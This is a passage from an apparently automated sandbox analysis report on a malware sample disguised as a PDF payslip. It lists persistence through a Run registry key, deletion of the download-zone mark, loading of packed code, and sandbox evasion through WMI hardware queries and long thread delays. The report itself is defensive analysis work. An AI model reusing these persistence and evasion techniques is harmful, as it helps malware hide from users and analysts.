                    Source: 0.2.Payslip_October_2024_pdf.exe.39d72f8.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs - .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.cs - .Net Code: AbTT8O94en System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.cs - .Net Code: AbTT8O94en System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.39b72d8.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs - .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: Payslip_October_2024_pdf.exe - Static PE information: 0xA7C547C1 [Wed Mar 12 19:47:13 2059 UTC]
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - Code function: 0_2_0274E768 pushfd ; retf 0_2_0274E769
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Code function: 4_2_0167E768 pushfd ; retf 4_2_0167E769
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Code function: 5_2_02CEF7C8 pushad ; retf 5_2_02CEF7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Code function: 5_2_02CE0C55 push edi; retf 5_2_02CE0C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Code function: 7_2_0302E768 pushfd ; retf 7_2_0302E769
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Code function: 8_2_013CF7C8 pushad ; retf 8_2_013CF7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Code function: 8_2_013C0C55 push edi; retf 8_2_013C0C7A
                    Source: Payslip_October_2024_pdf.exe - Static PE information: section name: .text entropy: 7.659760721121941
                    Source: sgxIb.exe.3.dr - Static PE information: section name: .text entropy: 7.659760721121941
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match, File source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 432, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Window / User API: threadDelayed 7719
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Window / User API: threadDelayed 2117
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 6298
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 3552
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 2422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 7415
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596526Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596420Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596283Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596035Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595670Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595016Jump to behavior
